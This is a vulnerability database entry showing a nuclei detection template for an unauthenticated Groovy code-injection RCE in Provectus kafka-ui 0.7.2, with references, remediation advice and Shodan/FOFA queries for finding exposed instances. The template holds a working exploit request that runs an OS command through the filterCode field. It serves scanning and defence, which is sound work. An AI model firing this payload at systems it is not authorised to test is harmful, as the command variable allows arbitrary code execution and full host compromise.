Lucene search
+L

Provectus kafka-ui <=0.7.2 - Remote Code Execution

🗓️ 14 Sep 2026 05:13:46Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 3 Views

Unauthenticated RCE in Provectus kafka-ui <=0.7.2 via unsandboxed Groovy filterCode injection.

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2026-5562
5 Apr 202611:00
attackerkb
circl
Circl
CVE-2026-5562
5 Apr 202612:56
circl
cnnvd
CNNVD
kafka-ui 代码注入漏洞
5 Apr 202600:00
cnnvd
cve
CVE
CVE-2026-5562
5 Apr 202611:00
cve
cvelist
Cvelist
CVE-2026-5562 provectus kafka-ui Endpoint testexecutions validateAccess code injection
5 Apr 202611:00
cvelist
euvd
EUVD
EUVD-2026-19071
5 Apr 202612:30
euvd
kitploit
Kitploit
CVE-2026-5562-Exploit
8 Sep 202612:58
kitploit
nvd
NVD
CVE-2026-5562
5 Apr 202611:16
nvd
ptsecurity
Positive Technologies
PT-2026-30432
5 Apr 202600:00
ptsecurity
redhatcve
RedhatCVE
CVE-2026-5562
7 Apr 202610:52
redhatcve
Rows per page
id: CVE-2026-5562

info:
  name: Provectus kafka-ui <=0.7.2 - Remote Code Execution
  author: christianfl,0xNayel
  severity: critical
  description: |
    Provectus kafka-ui versions 0.7.0 through 0.7.2 are vulnerable to code injection in the `/api/smartfilters/testexecutions` endpoint. The `filterCode` parameter is evaluated as a Groovy expression without sandboxing, allowing an unauthenticated attacker to execute arbitrary code and operating-system commands on the host.
  impact: |
    Successful exploitation grants unauthenticated remote code execution in the context of the kafka-ui process, leading to full compromise of the host and the connected Kafka clusters.
  remediation: |
    Provectus kafka-ui is end-of-life and no patched release exists (0.7.2 is the final version). Migrate to the maintained kafbat/kafka-ui fork, and in the meantime restrict network access to the interface and place it behind authentication.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-5562
    - https://vuldb.com/?id.355332
    - https://github.com/provectus/kafka-ui
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-5562
    cwe-id: CWE-94
  metadata:
    verified: true
    max-request: 1
    vendor: provectus
    product: kafka-ui
    shodan-query: http.title:"UI for Apache Kafka"
    fofa-query: title="UI for Apache Kafka"
  tags: cve,cve2026,rce,kafka-ui,provectus,groovy,injection,intrusive

variables:
  cmd: "id"
  marker: "{{rand_base(6)}}"

http:
  - raw:
      - |
        PUT /api/smartfilters/testexecutions HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept: application/json

        {
          "filterCode": "throw new Exception('{{marker}}_' + '{{cmd}}'.execute().text)",
          "key": "k",
          "value": "v",
          "offset": 0,
          "partition": 0,
          "timestampMs": 0
        }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{marker}}_"

      - type: regex
        part: body
        regex:
          - "uid=[0-9]+.*gid=[0-9]+.*"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        group: 1
        regex:
          - "{{marker}}_(uid=[0-9]+\\([a-z0-9_-]+\\)[^\"\\\\]*)"
# digest: 4a0a0047304502202274dae6ced61f2e7306ef639bc83fb2425ff944504ffba159af7181c61946a0022100c9c703beaf876637ecabe2be85d37c875ccc907e9300a46897b59578613b3109:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

10 Sep 2026 15:35Current
CVSS 3.17.3 - 9.8
CVSS 46.9
CVSS 27.5
CVSS 37.3
EPSS0.0062
SSVC
3